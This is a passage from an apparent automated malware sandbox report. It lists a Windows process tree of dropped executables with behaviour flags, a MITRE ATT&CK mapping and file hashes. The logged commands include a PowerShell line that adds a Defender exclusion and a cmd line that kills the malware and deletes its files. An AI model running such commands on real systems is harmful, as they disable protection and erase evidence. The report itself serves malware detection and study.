                                                                                      c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                                                                                      1⤵
                                                                                        PID:1368
                                                                                      • c:\windows\system32\svchost.exe
                                                                                        c:\windows\system32\svchost.exe -k netsvcs -s Themes
                                                                                        1⤵
                                                                                          PID:1164
                                                                                        • c:\windows\system32\svchost.exe
                                                                                          c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                                                                                          1⤵
                                                                                            PID:1112
                                                                                          • c:\windows\system32\svchost.exe
                                                                                            c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                                                                                            1⤵
                                                                                            • Drops file in System32 directory
                                                                                            PID:344
                                                                                            • C:\Users\Admin\AppData\Roaming\ftsweha
                                                                                              C:\Users\Admin\AppData\Roaming\ftsweha
                                                                                              2⤵
                                                                                              • Executes dropped EXE
                                                                                              • Checks SCSI registry key(s)
                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                              PID:6444
                                                                                            • C:\Users\Admin\AppData\Roaming\dhsweha
                                                                                              C:\Users\Admin\AppData\Roaming\dhsweha
                                                                                              2⤵
                                                                                              • Executes dropped EXE
                                                                                              • Suspicious use of SetThreadContext
                                                                                              PID:6204
                                                                                              • C:\Users\Admin\AppData\Roaming\dhsweha
                                                                                                C:\Users\Admin\AppData\Roaming\dhsweha
                                                                                                3⤵
                                                                                                • Executes dropped EXE
                                                                                                • Checks SCSI registry key(s)
                                                                                                • Suspicious behavior: MapViewOfSection
                                                                                                PID:4824
                                                                                            • C:\Users\Admin\AppData\Roaming\ftsweha
                                                                                              C:\Users\Admin\AppData\Roaming\ftsweha
                                                                                              2⤵
                                                                                              • Executes dropped EXE
                                                                                              • Checks SCSI registry key(s)
                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                              PID:5852
                                                                                            • C:\Users\Admin\AppData\Roaming\dhsweha
                                                                                              C:\Users\Admin\AppData\Roaming\dhsweha
                                                                                              2⤵
                                                                                              • Executes dropped EXE
                                                                                              • Suspicious use of SetThreadContext
                                                                                              PID:4304
                                                                                              • C:\Users\Admin\AppData\Roaming\dhsweha
                                                                                                C:\Users\Admin\AppData\Roaming\dhsweha
                                                                                                3⤵
                                                                                                • Executes dropped EXE
                                                                                                • Checks SCSI registry key(s)
                                                                                                • Suspicious behavior: MapViewOfSection
                                                                                                PID:2240
                                                                                            • C:\Users\Admin\AppData\Roaming\ftsweha
                                                                                              C:\Users\Admin\AppData\Roaming\ftsweha
                                                                                              2⤵
                                                                                              • Executes dropped EXE
                                                                                              • Checks SCSI registry key(s)
                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                              PID:4136
                                                                                            • C:\Users\Admin\AppData\Roaming\dhsweha
                                                                                              C:\Users\Admin\AppData\Roaming\dhsweha
                                                                                              2⤵
                                                                                              • Executes dropped EXE
                                                                                              • Suspicious use of SetThreadContext
                                                                                              PID:6808
                                                                                              • C:\Users\Admin\AppData\Roaming\dhsweha
                                                                                                C:\Users\Admin\AppData\Roaming\dhsweha
                                                                                                3⤵
                                                                                                • Executes dropped EXE
                                                                                                • Checks SCSI registry key(s)
                                                                                                • Suspicious behavior: MapViewOfSection
                                                                                                PID:4440
                                                                                            • C:\Windows\system32\rundll32.exe
                                                                                              C:\Windows\system32\rundll32.exe "C:\Program Files (x86)\ogdtzM\ogdtzM.dll",ogdtzM
                                                                                              2⤵
                                                                                              • Windows security modification
                                                                                              • Drops file in System32 directory
                                                                                              • Modifies data under HKEY_USERS
                                                                                              PID:6312
                                                                                          • c:\windows\system32\svchost.exe
                                                                                            c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                                                                                            1⤵
                                                                                              PID:996
                                                                                            • \??\c:\windows\system32\svchost.exe
                                                                                              c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                              1⤵
                                                                                              • Suspicious use of SetThreadContext
                                                                                              • Suspicious use of WriteProcessMemory
                                                                                              PID:412
                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                2⤵
                                                                                                • Drops file in System32 directory
                                                                                                • Checks processor information in registry
                                                                                                • Modifies data under HKEY_USERS
                                                                                                PID:5288
                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                              1⤵
                                                                                              • Drops file in Windows directory
                                                                                              • Modifies Internet Explorer settings
                                                                                              • Modifies registry class
                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                              PID:4148
                                                                                            • C:\Windows\system32\browser_broker.exe
                                                                                              C:\Windows\system32\browser_broker.exe -Embedding
                                                                                              1⤵
                                                                                              • Modifies Internet Explorer settings
                                                                                              PID:4188
                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                              1⤵
                                                                                              • Modifies registry class
                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                              • Suspicious use of WriteProcessMemory
                                                                                              PID:5440
                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                              1⤵
                                                                                              • Modifies Internet Explorer settings
                                                                                              • Modifies registry class
                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                              PID:5664
                                                                                            • C:\Windows\system32\msiexec.exe
                                                                                              C:\Windows\system32\msiexec.exe /V
                                                                                              1⤵
                                                                                              • Enumerates connected drives
                                                                                              • Drops file in Program Files directory
                                                                                              • Drops file in Windows directory
                                                                                              • Modifies data under HKEY_USERS
                                                                                              • Modifies registry class
                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                              • Suspicious use of WriteProcessMemory
                                                                                              PID:4556
                                                                                              • C:\Windows\syswow64\MsiExec.exe
                                                                                                C:\Windows\syswow64\MsiExec.exe -Embedding BB982CF2CC96926FFEA14625EC94C34A C
                                                                                                2⤵
                                                                                                • Loads dropped DLL
                                                                                                PID:4776
                                                                                              • C:\Windows\syswow64\MsiExec.exe
                                                                                                C:\Windows\syswow64\MsiExec.exe -Embedding ABC379DF89BC3FF5C09BCF40CF2DCFF2
                                                                                                2⤵
                                                                                                  PID:4996
                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                    "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
                                                                                                    3⤵
                                                                                                    • Kills process with taskkill
                                                                                                    PID:5628
                                                                                                • C:\Windows\syswow64\MsiExec.exe
                                                                                                  C:\Windows\syswow64\MsiExec.exe -Embedding 794227AEDCA5DA2E5919177C2A6CB2D2 E Global\MSI0000
                                                                                                  2⤵
                                                                                                  • Loads dropped DLL
                                                                                                  PID:5180
                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                1⤵
                                                                                                • Modifies registry class
                                                                                                PID:5056
                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                1⤵
                                                                                                • Modifies registry class
                                                                                                PID:4576
                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                1⤵
                                                                                                • Modifies registry class
                                                                                                PID:6204
                                                                                              • C:\Users\Admin\AppData\Local\Temp\953.exe
                                                                                                C:\Users\Admin\AppData\Local\Temp\953.exe
                                                                                                1⤵
                                                                                                • Executes dropped EXE
                                                                                                • Loads dropped DLL
                                                                                                • Checks processor information in registry
                                                                                                PID:6020
                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 6020 -s 860
                                                                                                  2⤵
                                                                                                  • Drops file in Windows directory
                                                                                                  • Program crash
                                                                                                  PID:6688
                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 6020 -s 916
                                                                                                  2⤵
                                                                                                  • Program crash
                                                                                                  PID:6508
                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 6020 -s 988
                                                                                                  2⤵
                                                                                                  • Program crash
                                                                                                  PID:4584
                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 6020 -s 1116
                                                                                                  2⤵
                                                                                                  • Program crash
                                                                                                  PID:5196
                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 6020 -s 1080
                                                                                                  2⤵
                                                                                                  • Program crash
                                                                                                  PID:2036
                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 6020 -s 1136
                                                                                                  2⤵
                                                                                                  • Program crash
                                                                                                  PID:4384
                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 6020 -s 1404
                                                                                                  2⤵
                                                                                                  • Program crash
                                                                                                  PID:5680
                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 6020 -s 1472
                                                                                                  2⤵
                                                                                                  • Program crash
                                                                                                  PID:1820
                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 6020 -s 1596
                                                                                                  2⤵
                                                                                                  • Program crash
                                                                                                  PID:5340
                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 6020 -s 1696
                                                                                                  2⤵
                                                                                                  • Program crash
                                                                                                  PID:6536
                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 6020 -s 1620
                                                                                                  2⤵
                                                                                                  • Program crash
                                                                                                  PID:5136
                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 6020 -s 1820
                                                                                                  2⤵
                                                                                                  • Program crash
                                                                                                  PID:852
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  "C:\Windows\System32\cmd.exe" /c taskkill /im 953.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\953.exe" & del C:\ProgramData\*.dll & exit
                                                                                                  2⤵
                                                                                                    PID:5980
                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      3⤵
                                                                                                        PID:4692
                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                        taskkill /im 953.exe /f
                                                                                                        3⤵
                                                                                                        • Kills process with taskkill
                                                                                                        PID:5068
                                                                                                      • C:\Windows\SysWOW64\timeout.exe
                                                                                                        timeout /t 6
                                                                                                        3⤵
                                                                                                        • Delays execution with timeout.exe
                                                                                                        PID:4164
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\2807.exe
                                                                                                    C:\Users\Admin\AppData\Local\Temp\2807.exe
                                                                                                    1⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Windows security modification
                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                    • Suspicious use of SetThreadContext
                                                                                                    PID:5628
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\647ade58-a10b-4f35-adfc-7d25710b5cfb\AdvancedRun.exe
                                                                                                      "C:\Users\Admin\AppData\Local\Temp\647ade58-a10b-4f35-adfc-7d25710b5cfb\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\647ade58-a10b-4f35-adfc-7d25710b5cfb\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
                                                                                                      2⤵
                                                                                                      • Executes dropped EXE
                                                                                                      PID:4536
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\647ade58-a10b-4f35-adfc-7d25710b5cfb\AdvancedRun.exe
                                                                                                        "C:\Users\Admin\AppData\Local\Temp\647ade58-a10b-4f35-adfc-7d25710b5cfb\AdvancedRun.exe" /SpecialRun 4101d8 4536
                                                                                                        3⤵
                                                                                                        • Executes dropped EXE
                                                                                                        PID:6624
                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\2807.exe" -Force
                                                                                                      2⤵
                                                                                                        PID:6596
                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                        "C:\Windows\System32\cmd.exe" /c timeout 1
                                                                                                        2⤵
                                                                                                          PID:4072
                                                                                                          • C:\Windows\SysWOW64\timeout.exe
                                                                                                            timeout 1
                                                                                                            3⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                            • Delays execution with timeout.exe
                                                                                                            PID:6468
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\2807.exe
                                                                                                          "C:\Users\Admin\AppData\Local\Temp\2807.exe"
                                                                                                          2⤵
                                                                                                          • Executes dropped EXE
                                                                                                          PID:4168
                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 5628 -s 1632
                                                                                                          2⤵
                                                                                                          • Program crash
                                                                                                          PID:4716
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\321A.exe
                                                                                                        C:\Users\Admin\AppData\Local\Temp\321A.exe
                                                                                                        1⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                        PID:5604
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\3DB4.exe
                                                                                                        C:\Users\Admin\AppData\Local\Temp\3DB4.exe
                                                                                                        1⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Suspicious use of SetThreadContext
                                                                                                        PID:4480
                                                                                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                          C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                          2⤵
                                                                                                            PID:6368
                                                                                                        • C:\Windows\SysWOW64\explorer.exe
                                                                                                          C:\Windows\SysWOW64\explorer.exe
                                                                                                          1⤵
                                                                                                            PID:5776
                                                                                                          • C:\Windows\explorer.exe
                                                                                                            C:\Windows\explorer.exe
                                                                                                            1⤵
                                                                                                              PID:5212
                                                                                                            • C:\Windows\SysWOW64\explorer.exe
                                                                                                              C:\Windows\SysWOW64\explorer.exe
                                                                                                              1⤵
                                                                                                                PID:5744
                                                                                                              • C:\Windows\explorer.exe
                                                                                                                C:\Windows\explorer.exe
                                                                                                                1⤵
                                                                                                                • Suspicious behavior: MapViewOfSection
                                                                                                                PID:4492
                                                                                                              • C:\Windows\SysWOW64\explorer.exe
                                                                                                                C:\Windows\SysWOW64\explorer.exe
                                                                                                                1⤵
                                                                                                                  PID:4128
                                                                                                                • C:\Windows\explorer.exe
                                                                                                                  C:\Windows\explorer.exe
                                                                                                                  1⤵
                                                                                                                  • Suspicious behavior: MapViewOfSection
                                                                                                                  PID:2780
                                                                                                                • C:\Windows\SysWOW64\explorer.exe
                                                                                                                  C:\Windows\SysWOW64\explorer.exe
                                                                                                                  1⤵
                                                                                                                    PID:6764
                                                                                                                  • C:\Windows\explorer.exe
                                                                                                                    C:\Windows\explorer.exe
                                                                                                                    1⤵
                                                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                                                    PID:6472
                                                                                                                  • C:\Windows\SysWOW64\explorer.exe
                                                                                                                    C:\Windows\SysWOW64\explorer.exe
                                                                                                                    1⤵
                                                                                                                      PID:6988
                                                                                                                    • \??\c:\windows\system32\svchost.exe
                                                                                                                      c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                                                                      1⤵
                                                                                                                        PID:4720
                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                        C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                                        1⤵
                                                                                                                          PID:5500
                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                          1⤵
                                                                                                                          • Drops file in Windows directory
                                                                                                                          • Modifies registry class
                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                          PID:6432
                                                                                                                        • C:\Windows\system32\browser_broker.exe
                                                                                                                          C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                          1⤵
                                                                                                                          • Modifies Internet Explorer settings
                                                                                                                          PID:4592
                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                          1⤵
                                                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                          PID:4912
                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                          1⤵
                                                                                                                          • Modifies registry class
                                                                                                                          PID:6328
                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                          1⤵
                                                                                                                            PID:5632
                                                                                                                          • \??\c:\windows\system32\svchost.exe
                                                                                                                            c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                                                                            1⤵
                                                                                                                              PID:5700
                                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                                              C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                                              1⤵
                                                                                                                                PID:4012

                                                                                                                              Network

                                                                                                                              MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                              Persistence

                                                                                                                              Registry Run Keys / Startup Folder

                                                                                                                              1
                                                                                                                              T1060

                                                                                                                              BITS Jobs

                                                                                                                              1
                                                                                                                              T1197

                                                                                                                              Defense Evasion

                                                                                                                              Disabling Security Tools

                                                                                                                              3
                                                                                                                              T1089

                                                                                                                              Modify Registry

                                                                                                                              6
                                                                                                                              T1112

                                                                                                                              BITS Jobs

                                                                                                                              1
                                                                                                                              T1197

                                                                                                                              Install Root Certificate

                                                                                                                              1
                                                                                                                              T1130

                                                                                                                              Credential Access

                                                                                                                              Credentials in Files

                                                                                                                              5
                                                                                                                              T1081

                                                                                                                              Discovery

                                                                                                                              Software Discovery

                                                                                                                              1
                                                                                                                              T1518

                                                                                                                              Query Registry

                                                                                                                              5
                                                                                                                              T1012

                                                                                                                              System Information Discovery

                                                                                                                              5
                                                                                                                              T1082

                                                                                                                              Security Software Discovery

                                                                                                                              1
                                                                                                                              T1063

                                                                                                                              Peripheral Device Discovery

                                                                                                                              2
                                                                                                                              T1120

                                                                                                                              Remote System Discovery

                                                                                                                              1
                                                                                                                              T1018

                                                                                                                              Collection

                                                                                                                              Data from Local System

                                                                                                                              5
                                                                                                                              T1005

                                                                                                                              Command and Control

                                                                                                                              Web Service

                                                                                                                              1
                                                                                                                              T1102

                                                                                                                              Replay Monitor

                                                                                                                              Loading Replay Monitor...

                                                                                                                              Downloads

                                                                                                                              • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                                MD5

                                                                                                                                7124be0b78b9f4976a9f78aaeaed893a

                                                                                                                                SHA1

                                                                                                                                804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                                                                                                SHA256

                                                                                                                                bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                                                                                                SHA512

                                                                                                                                49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                                                                                              • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                                MD5

                                                                                                                                7124be0b78b9f4976a9f78aaeaed893a

                                                                                                                                SHA1

                                                                                                                                804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                                                                                                SHA256

                                                                                                                                bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                                                                                                SHA512

                                                                                                                                49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                                                                                              • C:\Program Files\Common Files\UUUJKLOPTG\ultramediaburner.exe
                                                                                                                                MD5

                                                                                                                                6103ca066cd5345ec41feaf1a0fdadaf

                                                                                                                                SHA1

                                                                                                                                938acc555933ee4887629048be4b11df76bb8de8

                                                                                                                                SHA256

                                                                                                                                b8d950bf6fa228454571f15cc4b7b6fbaa539f1284e43946abd90934db925201

                                                                                                                                SHA512

                                                                                                                                a9062e1fac2f6073a134d9756c84f70999240e36a98cb39684018e7d5bd3772f2ca21ab35bd2c6bd60413eb7306376e7f530e78ce4ebcfe256f766e8c42d16b3

                                                                                                                              • C:\Program Files\Common Files\UUUJKLOPTG\ultramediaburner.exe
                                                                                                                                MD5

                                                                                                                                6103ca066cd5345ec41feaf1a0fdadaf

                                                                                                                                SHA1

                                                                                                                                938acc555933ee4887629048be4b11df76bb8de8

                                                                                                                                SHA256

                                                                                                                                b8d950bf6fa228454571f15cc4b7b6fbaa539f1284e43946abd90934db925201

                                                                                                                                SHA512

                                                                                                                                a9062e1fac2f6073a134d9756c84f70999240e36a98cb39684018e7d5bd3772f2ca21ab35bd2c6bd60413eb7306376e7f530e78ce4ebcfe256f766e8c42d16b3

                                                                                                                              • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8890A77645B73478F5B1DED18ACBF795_C090A8C88B266C6FF99A97210E92B44D
                                                                                                                                MD5

                                                                                                                                e8f9ee1acf0775666bd07aba781e96bc

                                                                                                                                SHA1

                                                                                                                                24bd2847a41293057f07d97f91fe375848aa70f3

                                                                                                                                SHA256

                                                                                                                                58ce03a252b823a3e76d8b3f7bd8b0f11d0ee879a48064f8cec6039185f637e3

                                                                                                                                SHA512

                                                                                                                                a9fc40ee024158c9c0a66b6fc298bdc2d7d67606610af66506ad7b907332aaf3dd680d342303ebc1977700266c440417d06ef752b6300b3e3e86913403c6fd9e

                                                                                                                              • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\DA3B6E45325D5FFF28CF6BAD6065C907_7ACDCC18BE3F9272783F723CF7E4C78B
                                                                                                                                MD5

                                                                                                                                b0b41126565a0a6e9983b80bbeeeda52

                                                                                                                                SHA1

                                                                                                                                55de1515ae28f594d7eb30211df6aa99b2ce6bd5

                                                                                                                                SHA256

                                                                                                                                74e93fcf70e5301715d1d53cc2e2a1eb484bcad74baea28bbe648a5161e0c5a5

                                                                                                                                SHA512

                                                                                                                                0b31bc5ec69834e7e9228bf373176286c697f7ac23a541f655aa4bc50284ea643d25c3cdbd7ecf1e4e0d128c6dc06a74ad1c2480d7a8661ee4d4c7cd25ef7ffc

                                                                                                                              • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8890A77645B73478F5B1DED18ACBF795_C090A8C88B266C6FF99A97210E92B44D
                                                                                                                                MD5

                                                                                                                                a689d710a5f587ecee158e8f80eef9f8

                                                                                                                                SHA1

                                                                                                                                4662422820d803c19b12d12675f555ae56bc8bc5

                                                                                                                                SHA256

                                                                                                                                c01e27d0c869938ae59c8574480b59d9abde0a00c79d42bb4a7c88744a1b594b

                                                                                                                                SHA512

                                                                                                                                5ae1759f7592b610318f06724f926ebb4606b3870d4ec6889709a8dac9f389442a65cd3d9a5f9fae791da99b50b0f2b578e68012349a59ca4e113a736c3c60e1

                                                                                                                              • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\DA3B6E45325D5FFF28CF6BAD6065C907_7ACDCC18BE3F9272783F723CF7E4C78B
                                                                                                                                MD5

                                                                                                                                678ff9c352e6061fb7aef63c9677ee9b

                                                                                                                                SHA1

                                                                                                                                f0e48f4083495c0874e6ec79767328edbc5c0b16

                                                                                                                                SHA256

                                                                                                                                e256609cfe42bbd17a3e8840acfacb6772903a311e248237caa6aa76c506662d

                                                                                                                                SHA512

                                                                                                                                72a0fc8e8d17ab04506fa4bceb498c161cefd95ca403c2d1b1c010c598eaf9d98f301dc4ab702be44cede59ec0f71ed66ca842d95b13842094000c160c8e5f41

                                                                                                                              • C:\Users\Admin\AppData\Local\AdvinstAnalytics\6073fee5118372253d99d22b\1.0.0\tracking.ini
                                                                                                                                MD5

                                                                                                                                e5328d7209fa97ccb163dbc9edd970d9

                                                                                                                                SHA1

                                                                                                                                b5ca44296b28c4a00a0bf7e1deb53469e7069439

                                                                                                                                SHA256

                                                                                                                                0c80eabd2dc59246bf0e94e1f4a0bc3c43dde28902a8527dbb69a974faca088b

                                                                                                                                SHA512

                                                                                                                                7eb5b94ed6ffc7c1e1e87d510191020513411672d0cbd3dcd9cef380bad55338af5782968c5fa00546561e8256db983b8367252b7460b62871bbe1636260bd0e

                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\2c-30d94-59e-53d92-6097ea22d25e7\Kenessey.txt
                                                                                                                                MD5

                                                                                                                                97384261b8bbf966df16e5ad509922db

                                                                                                                                SHA1

                                                                                                                                2fc42d37fee2c81d767e09fb298b70c748940f86

                                                                                                                                SHA256

                                                                                                                                9c0d294c05fc1d88d698034609bb81c0c69196327594e4c69d2915c80fd9850c

                                                                                                                                SHA512

                                                                                                                                b77fe2d86fbc5bd116d6a073eb447e76a74add3fa0d0b801f97535963241be3cdce1dbcaed603b78f020d0845b2d4bfc892ceb2a7d1c8f1d98abc4812ef5af21

                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\2c-30d94-59e-53d92-6097ea22d25e7\Pajaexishotu.exe
                                                                                                                                MD5

                                                                                                                                24988abf1cac1c74e9385b4bff16e8f7

                                                                                                                                SHA1

                                                                                                                                50bae2be9668aad4f3a3a7d404c731f541b12f67

                                                                                                                                SHA256

                                                                                                                                afad8cc3e378f4d22ca2e325a63998e4bcbb70509135532b450c22fdd47e993c

                                                                                                                                SHA512

                                                                                                                                a707b54611976264a3671907faabd817e58e4ee572637ad1193b7c346b7cb63b98a8e52a87cb2b135a5e40f0e97e3f040a04804c0164a1d6caa856b2f1fe742f

                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\2c-30d94-59e-53d92-6097ea22d25e7\Pajaexishotu.exe
                                                                                                                                MD5

                                                                                                                                24988abf1cac1c74e9385b4bff16e8f7

                                                                                                                                SHA1

                                                                                                                                50bae2be9668aad4f3a3a7d404c731f541b12f67

                                                                                                                                SHA256

                                                                                                                                afad8cc3e378f4d22ca2e325a63998e4bcbb70509135532b450c22fdd47e993c

                                                                                                                                SHA512

                                                                                                                                a707b54611976264a3671907faabd817e58e4ee572637ad1193b7c346b7cb63b98a8e52a87cb2b135a5e40f0e97e3f040a04804c0164a1d6caa856b2f1fe742f

                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\2c-30d94-59e-53d92-6097ea22d25e7\Pajaexishotu.exe.config
                                                                                                                                MD5

